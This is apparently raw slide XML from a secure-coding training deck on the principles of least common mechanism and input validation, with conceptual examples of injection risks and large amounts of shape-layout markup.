            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2906908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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-5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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-5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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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0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249" spc="-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249" spc="-6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at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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249" spc="-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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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20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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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 the Vulnerabilities</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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600" dirty="0"/>
              <a:t>Get to a command line prompt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2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600" dirty="0"/>
              <a:t>Escalates privilege until he or she has full control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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9145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120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 Coding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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Common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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="5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-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Introduction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332267"/>
            <a:ext cx="10272259" cy="2671384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217739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Principle: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Mechanisms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3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resources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shared between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privilege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levels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513561" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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code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has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unnecessarily</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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complex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secure,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therefore,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more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likely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defect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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="79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Some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form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state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will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have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shared to control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 path of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execution,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it will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likely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be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exposed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attacker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48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small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error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result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 significant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breach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121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 Coding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Least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Common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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Example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10275433" cy="2749469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Both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regular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users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administrative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users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need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3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files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temptation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write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code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once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share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code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118709" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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choice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then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allow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all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users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administrator,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add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code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distinguish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between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two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9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mechanism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deciding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allowed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privileges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part of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client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request,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then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subject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tampering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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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could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very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serious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vulnerability,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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so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protection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may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perfect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control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decision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has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made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software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each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operation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122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 Coding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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Common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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="5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-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Introduction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10202427" cy="2228904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can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all be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avoided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by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creating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two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copies of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 code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Each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works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different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privilege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levels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exposu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clien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-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sid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tampering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still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need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authenticate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pages,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but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operations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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85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often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avoid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these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situations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moving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code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into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common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core,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 using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wrapper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each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client-facing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case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123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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pP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Least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Common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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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-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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="8503610" cy="3786154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Alias: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Fail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Safely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tendency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among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developers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seek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"clever"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solutions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uri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oft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wea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mis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ta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Sharing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code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raises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risk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complexity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code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Consequences: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Clean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30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less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mplex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Simple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 inter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Fewer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opportunities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tampering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attacks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Mo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124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 Coding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Least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Common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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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-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Tips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267122"/>
            <a:ext cx="9798673" cy="2296832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Avoid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situations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where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code is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shared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between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different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privilege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levels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particularly true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where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3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control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resources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required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Fil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ystems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Datab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Und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rlyin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4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ating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sy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tems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mmuni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ati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systems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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2906908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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inputs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24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249" spc="-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at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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0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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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249" spc="-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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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20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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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126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6286518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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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0"/>
            <a:ext cx="10304001" cy="3133544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Principle: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All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inputs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treated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as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untrustworthy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Corollary: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Anything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coming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from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outside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application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may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agree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expected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input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requirements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1207408" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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Corollary: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Good developers validate their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inputs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regardless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security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considerations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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="47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Inputs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don't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meet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expectations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lead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program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states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are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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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undefined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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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Undefined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states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problematical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because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sure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way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predict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how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application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will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respond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127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6286518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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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32267"/>
            <a:ext cx="10038005" cy="3544917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536414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There are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many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vulnerabilities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created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or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worsened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using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unvalidated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inputs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code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constructs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854454" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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All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injection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vulnerabilities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(SQLi,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XSS,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HTTP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Response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Splitting, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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Command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Injection,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etc)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9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pen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edi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lo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-85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olled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60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ormat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Strin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…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4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ameter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4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ampering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12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125" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>…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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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addition,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you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allow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inputs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are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incorrect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any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reason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into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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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system,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risk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its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integrity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5759" y="192105"/>
            <a:ext cx="8638830" cy="7072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12697" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90778" marR="4940722">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32268"/>
            <a:ext cx="9909769" cy="720537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5078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 application is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accepting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input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from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email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server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that is running on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another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inside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your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Boundary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6486" y="2045696"/>
            <a:ext cx="5344673" cy="3049111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175842" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2424"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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What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coul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hap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en?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298995" indent="-286934" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1944"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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An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insider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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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access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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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email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server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uses that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  <a:p>
            <a:pPr marL="298995" marR="895716" defTabSz="914126"/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platform to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 send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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>persistent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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-15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into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the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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application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  <a:p>
            <a:pPr marL="298995" marR="24123" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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The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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>format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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for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 the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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incoming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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mail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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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the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application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 changes,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but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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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patches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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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email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server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don't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get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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done,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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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the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incoming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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5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crashes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the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application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  <a:p>
            <a:pPr marL="298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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The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email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 server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happens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have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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>backdoor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vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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that is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exploited;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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from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there,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the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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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can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misappropriate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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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service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that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accepts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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email 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input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perform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command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 injection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094775" y="2321214"/>
            <a:ext cx="1894346" cy="1970526"/>
            <a:chOff x="8096884" y="2320925"/>
            <a:chExt cx="1894839" cy="1971039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8111489" y="2335529"/>
              <a:ext cx="1865630" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1865629" h="730250">
                  <a:moveTo>
                    <a:pt x="0" y="364998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9261" y="313366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36206" y="263958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79570" y="217267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138091" y="173789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172641" y="153408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210506" y="134017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251530" y="115675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295554" y="98446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342420" y="82390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391970" y="67571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444048" y="54048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498494" y="41885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555151" y="31144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613861" y="21885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674467" y="14171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736810" y="8064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800733" y="3625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866078" y="916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999297" y="916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064642" y="3625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128565" y="8064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190908" y="14171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251514" y="21885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310224" y="31144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366881" y="41885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421327" y="54048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473405" y="67571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522955" y="82390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569821" y="98446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613845" y="115675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654869" y="134017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692734" y="153408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727284" y="173789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785805" y="217267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829169" y="263958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856114" y="313366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1865376" y="364998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863034" y="391060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844773" y="441642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809461" y="489753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758361" y="534899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692734" y="576587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654869" y="595978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613845" y="614320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569821" y="631549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522955" y="647605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473405" y="662424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421327" y="675947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366881" y="688110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310224" y="698851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251514" y="708110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190908" y="715824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128565" y="721931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064642" y="726370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999297" y="729079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932688" y="729996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866078" y="729079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800733" y="726370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736810" y="721931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674467" y="715824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613861" y="708110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555151" y="698851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498494" y="688110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444048" y="675947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391970" y="662424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342420" y="647605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295554" y="631549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251530" y="614320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210506" y="595978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172641" y="576587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138091" y="556206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79570" y="512728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36206" y="466037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9261" y="416629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="364998"/>
                  </a:lnTo>
                  <a:close/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8111489" y="3548633"/>
              <a:ext cx="1865630" cy="728980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1865629" h="728979">
                  <a:moveTo>
                    <a:pt x="0" y="364235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9261" y="312703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36206" y="263393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79570" y="216797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138091" y="173408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172641" y="153071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210506" y="133720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251530" y="115418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295554" y="98226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342420" y="82206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391970" y="67418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444048" y="53926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498494" y="41790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555151" y="31073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613861" y="21835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674467" y="14138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736810" y="8045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800733" y="3616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866078" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999297" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064642" y="3616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128565" y="8045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190908" y="14138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251514" y="21835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310224" y="31073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366881" y="41790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421327" y="53926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473405" y="67418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522955" y="82206"/>
                  </a:lnTo>
                  <a:lnTo>
